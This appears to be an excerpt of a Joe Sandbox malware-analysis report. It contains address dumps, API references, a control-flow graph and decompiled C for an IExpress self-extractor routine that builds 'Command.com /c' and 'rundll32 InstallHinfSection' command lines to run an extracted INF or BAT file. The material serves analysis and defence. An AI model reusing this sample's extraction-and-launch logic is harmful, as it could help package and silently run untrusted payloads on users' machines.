                                                                                                                                                                                                                                              0x001a3ef3
                                                                                                                                                                                                                                              0x001a3ef3
                                                                                                                                                                                                                                              0x001a3ef5
                                                                                                                                                                                                                                              0x001a3efa
                                                                                                                                                                                                                                              0x001a3efb
                                                                                                                                                                                                                                              0x001a3efd
                                                                                                                                                                                                                                              0x001a3f40
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3eff
                                                                                                                                                                                                                                              0x001a3eff
                                                                                                                                                                                                                                              0x001a3f05
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3f05
                                                                                                                                                                                                                                              0x001a3efd
                                                                                                                                                                                                                                              0x001a3dc7
                                                                                                                                                                                                                                              0x001a3dce
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3dd0
                                                                                                                                                                                                                                              0x001a3dd7
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3dd9
                                                                                                                                                                                                                                              0x001a3ddb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3ddd
                                                                                                                                                                                                                                              0x001a3de1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3de1
                                                                                                                                                                                                                                              0x001a3d59
                                                                                                                                                                                                                                              0x001a3d65
                                                                                                                                                                                                                                              0x001a3d6a
                                                                                                                                                                                                                                              0x001a3d6c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3d6e
                                                                                                                                                                                                                                              0x001a3d75
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3d8f
                                                                                                                                                                                                                                              0x001a3d96
                                                                                                                                                                                                                                              0x001a3d98
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3d98
                                                                                                                                                                                                                                              0x001a3c8f
                                                                                                                                                                                                                                              0x001a3c98
                                                                                                                                                                                                                                              0x001a3cf1
                                                                                                                                                                                                                                              0x001a3cf3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3cfe
                                                                                                                                                                                                                                              0x001a3d11
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3d11
                                                                                                                                                                                                                                              0x001a3c9c
                                                                                                                                                                                                                                              0x001a3ca5
                                                                                                                                                                                                                                              0x001a3ca7
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3cad
                                                                                                                                                                                                                                              0x001a3cb2
                                                                                                                                                                                                                                              0x001a3cb7
                                                                                                                                                                                                                                              0x001a3cc5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3ce8
                                                                                                                                                                                                                                              0x001a3cec
                                                                                                                                                                                                                                              0x001a3ced
                                                                                                                                                                                                                                              0x001a3ced
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3ce8
                                                                                                                                                                                                                                              0x001a3c9e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3c9e
                                                                                                                                                                                                                                              0x001a3c56
                                                                                                                                                                                                                                              0x001a3d35
                                                                                                                                                                                                                                              0x001a3d35
                                                                                                                                                                                                                                              0x001a3d3c
                                                                                                                                                                                                                                              0x001a3d48
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3d48
                                                                                                                                                                                                                                              0x001a3c03
                                                                                                                                                                                                                                              0x001a3be2
                                                                                                                                                                                                                                              0x001a3be7
                                                                                                                                                                                                                                              0x001a3bee
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 001A3C11
                                                                                                                                                                                                                                              • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 001A3CDC
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46A0
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: SizeofResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46A9
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46C3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LoadResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46CC
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LockResource.KERNEL32(00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46D3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: memcpy_s.MSVCRT ref: 001A46E5
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46EF
                                                                                                                                                                                                                                              • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,001A8C42), ref: 001A3D8F
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 001A3E26
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,001A8C42), ref: 001A3EFF
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,001A8C42), ref: 001A3F1F
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,001A8C42), ref: 001A3F40
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,001A8C42), ref: 001A3F47
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,001A8C42), ref: 001A3F76
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,001A8C42), ref: 001A3F80
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,001A8C42), ref: 001A3FC2
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                              • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                                                                                                                                                                                              • API String ID: 1032054927-139961720
                                                                                                                                                                                                                                              • Opcode ID: 0a1d1403cc8d3b51f35dfdd5fa1d7e057f33fe5b9118e8f7e025c81f155c289b
                                                                                                                                                                                                                                              • Instruction ID: d674017c03386859adc967403a626746d39a58ad6d92668e0bf65447a963e9ed
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a1d1403cc8d3b51f35dfdd5fa1d7e057f33fe5b9118e8f7e025c81f155c289b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9B1F1B8A183019FD720DF64CD45B6B76E4EB87750F10092EFAA5D7191EB70CA84CB92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 141 1a1ae8-1a1b2c call 1a1680 144 1a1b3b-1a1b40 141->144 145 1a1b2e-1a1b39 141->145 146 1a1b46-1a1b61 call 1a1a84 144->146 145->146 149 1a1b9f-1a1bc2 call 1a1781 call 1a658a 146->149 150 1a1b63-1a1b65 146->150 159 1a1bc7-1a1bd3 call 1a66c8 149->159 151 1a1b68-1a1b6d 150->151 151->151 153 1a1b6f-1a1b74 151->153 153->149 155 1a1b76-1a1b7b 153->155 157 1a1b7d-1a1b81 155->157 158 1a1b83-1a1b86 155->158 157->158 161 1a1b8c-1a1b9d call 1a1680 157->161 158->149 162 1a1b88-1a1b8a 158->162 165 1a1bd9-1a1bf1 CompareStringA 159->165 166 1a1d73-1a1d7f call 1a66c8 159->166 161->159 162->149 162->161 165->166 168 1a1bf7-1a1c07 GetFileAttributesA 165->168 175 1a1df8-1a1e09 LocalAlloc 166->175 176 1a1d81-1a1d99 CompareStringA 166->176 170 1a1c0d-1a1c15 168->170 171 1a1d53-1a1d5e 168->171 170->171 174 1a1c1b-1a1c33 call 1a1a84 170->174 173 1a1d64-1a1d6e call 1a44b9 171->173 187 1a1e94-1a1ea4 call 1a6ce0 173->187 189 1a1c50-1a1c61 LocalAlloc 174->189 190 1a1c35-1a1c38 174->190 178 1a1e0b-1a1e1b GetFileAttributesA 175->178 179 1a1dd4-1a1ddf 175->179 176->175 181 1a1d9b-1a1da2 176->181 183 1a1e1d-1a1e1f 178->183 184 1a1e67-1a1e73 call 1a1680 178->184 179->173 186 1a1da5-1a1daa 181->186 183->184 188 1a1e21-1a1e3e call 1a1781 183->188 199 1a1e78-1a1e84 call 1a2aac 184->199 186->186 191 1a1dac-1a1db4 186->191 188->199 210 1a1e40-1a1e43 188->210 189->179 198 1a1c67-1a1c72 189->198 195 1a1c3a 190->195 196 1a1c40-1a1c4b call 1a1a84 190->196 197 1a1db7-1a1dbc 191->197 195->196 196->189 197->197 203 1a1dbe-1a1dd2 LocalAlloc 197->203 204 1a1c79-1a1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 198->204 205 1a1c74 198->205 209 1a1e89-1a1e92 199->209 203->179 211 1a1de1-1a1df3 call 1a171e 203->211 207 1a1cf8-1a1d07 204->207 208 1a1cc2-1a1ccc 204->208 205->204 215 1a1d09-1a1d21 GetShortPathNameA 207->215 216 1a1d23 207->216 212 1a1cce 208->212 213 1a1cd3-1a1cf3 call 1a1680 * 2 208->213 209->187 210->199 214 1a1e45-1a1e65 call 1a16b3 * 2 210->214 211->209 212->213 213->209 214->199 220 1a1d28-1a1d2b 215->220 216->220 224 1a1d2d 220->224 225 1a1d32-1a1d4e call 1a171e 220->225 224->225 225->209
                                                                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                                                                              			E001A1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v527;
                                                                                                                                                                                                                                              				char _v528;
                                                                                                                                                                                                                                              				char _v1552;
                                                                                                                                                                                                                                              				CHAR* _v1556;
                                                                                                                                                                                                                                              				int* _v1560;
                                                                                                                                                                                                                                              				CHAR** _v1564;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t48;
                                                                                                                                                                                                                                              				CHAR* _t53;
                                                                                                                                                                                                                                              				CHAR* _t54;
                                                                                                                                                                                                                                              				char* _t57;
                                                                                                                                                                                                                                              				char* _t58;
                                                                                                                                                                                                                                              				CHAR* _t60;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				signed char _t65;
                                                                                                                                                                                                                                              				intOrPtr _t76;
                                                                                                                                                                                                                                              				intOrPtr _t77;
                                                                                                                                                                                                                                              				unsigned int _t85;
                                                                                                                                                                                                                                              				CHAR* _t90;
                                                                                                                                                                                                                                              				CHAR* _t92;
                                                                                                                                                                                                                                              				char _t105;
                                                                                                                                                                                                                                              				char _t106;
                                                                                                                                                                                                                                              				CHAR** _t111;
                                                                                                                                                                                                                                              				CHAR* _t115;
                                                                                                                                                                                                                                              				intOrPtr* _t125;
                                                                                                                                                                                                                                              				void* _t126;
                                                                                                                                                                                                                                              				CHAR* _t132;
                                                                                                                                                                                                                                              				CHAR* _t135;
                                                                                                                                                                                                                                              				void* _t138;
                                                                                                                                                                                                                                              				void* _t139;
                                                                                                                                                                                                                                              				void* _t145;
                                                                                                                                                                                                                                              				intOrPtr* _t146;
                                                                                                                                                                                                                                              				char* _t148;
                                                                                                                                                                                                                                              				CHAR* _t151;
                                                                                                                                                                                                                                              				void* _t152;
                                                                                                                                                                                                                                              				CHAR* _t155;
                                                                                                                                                                                                                                              				CHAR* _t156;
                                                                                                                                                                                                                                              				void* _t157;
                                                                                                                                                                                                                                              				signed int _t158;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t48 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                                                              				_t108 = __ecx;
                                                                                                                                                                                                                                              				_v1564 = _a4;
                                                                                                                                                                                                                                              				_v1560 = _a8;
                                                                                                                                                                                                                                              				E001A1680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                                                              				if(_v528 != 0x22) {
                                                                                                                                                                                                                                              					_t135 = " ";
                                                                                                                                                                                                                                              					_t53 =  &_v528;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t135 = "\"";
                                                                                                                                                                                                                                              					_t53 =  &_v527;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t111 =  &_v1556;
                                                                                                                                                                                                                                              				_v1556 = _t53;
                                                                                                                                                                                                                                              				_t54 = E001A1A84(_t111, _t135);
                                                                                                                                                                                                                                              				_t156 = _v1556;
                                                                                                                                                                                                                                              				_t151 = _t54;
                                                                                                                                                                                                                                              				if(_t156 == 0) {
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					_push(_t111);
                                                                                                                                                                                                                                              					E001A1781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                              					E001A658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                              					goto L13;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t132 = _t156;
                                                                                                                                                                                                                                              					_t148 =  &(_t132[1]);
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						_t105 =  *_t132;
                                                                                                                                                                                                                                              						_t132 =  &(_t132[1]);
                                                                                                                                                                                                                                              					} while (_t105 != 0);
                                                                                                                                                                                                                                              					_t111 = _t132 - _t148;
                                                                                                                                                                                                                                              					if(_t111 < 3) {
                                                                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t106 = _t156[1];
                                                                                                                                                                                                                                              					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                                                              						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                                                              							goto L12;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							goto L11;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						L11:
                                                                                                                                                                                                                                              						E001A1680( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                              						L13:
                                                                                                                                                                                                                                              						_t138 = 0x2e;
                                                                                                                                                                                                                                              						_t57 = E001A66C8(_t156, _t138);
                                                                                                                                                                                                                                              						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                                                              							_t139 = 0x2e;
                                                                                                                                                                                                                                              							_t115 = _t156;
                                                                                                                                                                                                                                              							_t58 = E001A66C8(_t115, _t139);
                                                                                                                                                                                                                                              							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                                                              								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                                                              								if(_t156 == 0) {
                                                                                                                                                                                                                                              									goto L43;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                                                              								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                                                              									E001A1680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_push(_t115);
                                                                                                                                                                                                                                              									_t108 = 0x400;
                                                                                                                                                                                                                                              									E001A1781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                                                              									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                                                              										E001A16B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                                                              										E001A16B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t140 = _t156;
                                                                                                                                                                                                                                              								 *_t156 = 0;
                                                                                                                                                                                                                                              								E001A2AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                                                              								goto L53;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t108 = "Command.com /c %s";
                                                                                                                                                                                                                                              								_t125 = "Command.com /c %s";
                                                                                                                                                                                                                                              								_t145 = _t125 + 1;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t76 =  *_t125;
                                                                                                                                                                                                                                              									_t125 = _t125 + 1;
                                                                                                                                                                                                                                              								} while (_t76 != 0);
                                                                                                                                                                                                                                              								_t126 = _t125 - _t145;
                                                                                                                                                                                                                                              								_t146 =  &_v268;
                                                                                                                                                                                                                                              								_t157 = _t146 + 1;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t77 =  *_t146;
                                                                                                                                                                                                                                              									_t146 = _t146 + 1;
                                                                                                                                                                                                                                              								} while (_t77 != 0);
                                                                                                                                                                                                                                              								_t140 = _t146 - _t157;
                                                                                                                                                                                                                                              								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                                                              								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                                                              								if(_t156 != 0) {
                                                                                                                                                                                                                                              									E001A171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                                                              									goto L53;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L43;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                              							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                                                              								_t140 = 0x525;
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_push(0x10);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_t60 =  &_v268;
                                                                                                                                                                                                                                              								goto L35;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t140 = "[";
                                                                                                                                                                                                                                              								_v1556 = _t151;
                                                                                                                                                                                                                                              								_t90 = E001A1A84( &_v1556, "[");
                                                                                                                                                                                                                                              								if(_t90 != 0) {
                                                                                                                                                                                                                                              									if( *_t90 != 0) {
                                                                                                                                                                                                                                              										_v1556 = _t90;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t140 = "]";
                                                                                                                                                                                                                                              									E001A1A84( &_v1556, "]");
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                                                              								if(_t156 == 0) {
                                                                                                                                                                                                                                              									L43:
                                                                                                                                                                                                                                              									_t60 = 0;
                                                                                                                                                                                                                                              									_t140 = 0x4b5;
                                                                                                                                                                                                                                              									_push(0);
                                                                                                                                                                                                                                              									_push(0x10);
                                                                                                                                                                                                                                              									_push(0);
                                                                                                                                                                                                                                              									L35:
                                                                                                                                                                                                                                              									_push(_t60);
                                                                                                                                                                                                                                              									E001A44B9(0, _t140);
                                                                                                                                                                                                                                              									_t62 = 0;
                                                                                                                                                                                                                                              									goto L54;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t155 = _v1556;
                                                                                                                                                                                                                                              									_t92 = _t155;
                                                                                                                                                                                                                                              									if( *_t155 == 0) {
                                                                                                                                                                                                                                              										_t92 = "DefaultInstall";
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									 *0x1a9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                                                              									 *_v1560 = 1;
                                                                                                                                                                                                                                              									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x1a1140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                                                              										 *0x1a9a34 =  *0x1a9a34 & 0xfffffffb;
                                                                                                                                                                                                                                              										if( *0x1a9a40 != 0) {
                                                                                                                                                                                                                                              											_t108 = "setupapi.dll";
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											_t108 = "setupx.dll";
                                                                                                                                                                                                                                              											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										if( *_t155 == 0) {
                                                                                                                                                                                                                                              											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_push( &_v268);
                                                                                                                                                                                                                                              										_push(_t155);
                                                                                                                                                                                                                                              										E001A171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										 *0x1a9a34 =  *0x1a9a34 | 0x00000004;
                                                                                                                                                                                                                                              										if( *_t155 == 0) {
                                                                                                                                                                                                                                              											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										E001A1680(_t108, 0x104, _t155);
                                                                                                                                                                                                                                              										_t140 = 0x200;
                                                                                                                                                                                                                                              										E001A1680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									L53:
                                                                                                                                                                                                                                              									_t62 = 1;
                                                                                                                                                                                                                                              									 *_v1564 = _t156;
                                                                                                                                                                                                                                              									L54:
                                                                                                                                                                                                                                              									_pop(_t152);
                                                                                                                                                                                                                                              									return E001A6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}














































                                                                                                                                                                                                                                              0x001a1af3
                                                                                                                                                                                                                                              0x001a1afa
                                                                                                                                                                                                                                              0x001a1b07
                                                                                                                                                                                                                                              0x001a1b09
                                                                                                                                                                                                                                              0x001a1b1a
                                                                                                                                                                                                                                              0x001a1b20
                                                                                                                                                                                                                                              0x001a1b2c
                                                                                                                                                                                                                                              0x001a1b3b
                                                                                                                                                                                                                                              0x001a1b40
                                                                                                                                                                                                                                              0x001a1b2e
                                                                                                                                                                                                                                              0x001a1b2e
                                                                                                                                                                                                                                              0x001a1b33
                                                                                                                                                                                                                                              0x001a1b33
                                                                                                                                                                                                                                              0x001a1b46
                                                                                                                                                                                                                                              0x001a1b4c
                                                                                                                                                                                                                                              0x001a1b52
                                                                                                                                                                                                                                              0x001a1b57
                                                                                                                                                                                                                                              0x001a1b5d
                                                                                                                                                                                                                                              0x001a1b61
                                                                                                                                                                                                                                              0x001a1b9f
                                                                                                                                                                                                                                              0x001a1b9f
                                                                                                                                                                                                                                              0x001a1bb1
                                                                                                                                                                                                                                              0x001a1bc2
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a1b63
                                                                                                                                                                                                                                              0x001a1b63
                                                                                                                                                                                                                                              0x001a1b65
                                                                                                                                                                                                                                              0x001a1b68
                                                                                                                                                                                                                                              0x001a1b68
                                                                                                                                                                                                                                              0x001a1b6a
                                                                                                                                                                                                                                              0x001a1b6b
                                                                                                                                                                                                                                              0x001a1b6f
                                                                                                                                                                                                                                              0x001a1b74
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a1b76
                                                                                                                                                                                                                                              0x001a1b7b
                                                                                                                                                                                                                                              0x001a1b86
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a1b8c
                                                                                                                                                                                                                                              0x001a1b8c
                                                                                                                                                                                                                                              0x001a1b98
                                                                                                                                                                                                                                              0x001a1bc7
                                                                                                                                                                                                                                              0x001a1bc9
                                                                                                                                                                                                                                              0x001a1bcc
                                                                                                                                                                                                                                              0x001a1bd3
                                                                                                                                                                                                                                              0x001a1d75
                                                                                                                                                                                                                                              0x001a1d76
                                                                                                                                                                                                                                              0x001a1d78
                                                                                                                                                                                                                                              0x001a1d7f
                                                                                                                                                                                                                                              0x001a1e05
                                                                                                                                                                                                                                              0x001a1e09
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a1e12
                                                                                                                                                                                                                                              0x001a1e1b
                                                                                                                                                                                                                                              0x001a1e73
                                                                                                                                                                                                                                              0x001a1e21
                                                                                                                                                                                                                                              0x001a1e21
                                                                                                                                                                                                                                              0x001a1e28
                                                                                                                                                                                                                                              0x001a1e37
                                                                                                                                                                                                                                              0x001a1e3e
                                                                                                                                                                                                                                              0x001a1e52
                                                                                                                                                                                                                                              0x001a1e60
                                                                                                                                                                                                                                              0x001a1e60
                                                                                                                                                                                                                                              0x001a1e3e
                                                                                                                                                                                                                                              0x001a1e79
                                                                                                                                                                                                                                              0x001a1e7b
                                                                                                                                                                                                                                              0x001a1e84
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a1d9b
                                                                                                                                                                                                                                              0x001a1d9b
                                                                                                                                                                                                                                              0x001a1da0
                                                                                                                                                                                                                                              0x001a1da2
                                                                                                                                                                                                                                              0x001a1da5
                                                                                                                                                                                                                                              0x001a1da5
                                                                                                                                                                                                                                              0x001a1da7
                                                                                                                                                                                                                                              0x001a1da8
                                                                                                                                                                                                                                              0x001a1dac
                                                                                                                                                                                                                                              0x001a1dae
                                                                                                                                                                                                                                              0x001a1db4
                                                                                                                                                                                                                                              0x001a1db7
                                                                                                                                                                                                                                              0x001a1db7
                                                                                                                                                                                                                                              0x001a1db9
                                                                                                                                                                                                                                              0x001a1dba
                                                                                                                                                                                                                                              0x001a1dbe
                                                                                                                                                                                                                                              0x001a1dc3
                                                                                                                                                                                                                                              0x001a1dce
                                                                                                                                                                                                                                              0x001a1dd2
                                                                                                                                                                                                                                              0x001a1deb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a1df0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a1dd2
                                                                                                                                                                                                                                              0x001a1bf7
                                                                                                                                                                                                                                              0x001a1bfe
                                                                                                                                                                                                                                              0x001a1c07
                                                                                                                                                                                                                                              0x001a1d55
                                                                                                                                                                                                                                              0x001a1d5a
                                                                                                                                                                                                                                              0x001a1d5b
                                                                                                                                                                                                                                              0x001a1d5d
                                                                                                                                                                                                                                              0x001a1d5e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a1c1b
                                                                                                                                                                                                                                              0x001a1c1b
                                                                                                                                                                                                                                              0x001a1c20
                                                                                                                                                                                                                                              0x001a1c2c
                                                                                                                                                                                                                                              0x001a1c33
                                                                                                                                                                                                                                              0x001a1c38
                                                                                                                                                                                                                                              0x001a1c3a
                                                                                                                                                                                                                                              0x001a1c3a
                                                                                                                                                                                                                                              0x001a1c40
                                                                                                                                                                                                                                              0x001a1c4b
                                                                                                                                                                                                                                              0x001a1c4b
                                                                                                                                                                                                                                              0x001a1c5d
                                                                                                                                                                                                                                              0x001a1c61
                                                                                                                                                                                                                                              0x001a1dd4
                                                                                                                                                                                                                                              0x001a1dd4
                                                                                                                                                                                                                                              0x001a1dd6
                                                                                                                                                                                                                                              0x001a1ddb
                                                                                                                                                                                                                                              0x001a1ddc
                                                                                                                                                                                                                                              0x001a1dde
                                                                                                                                                                                                                                              0x001a1d64
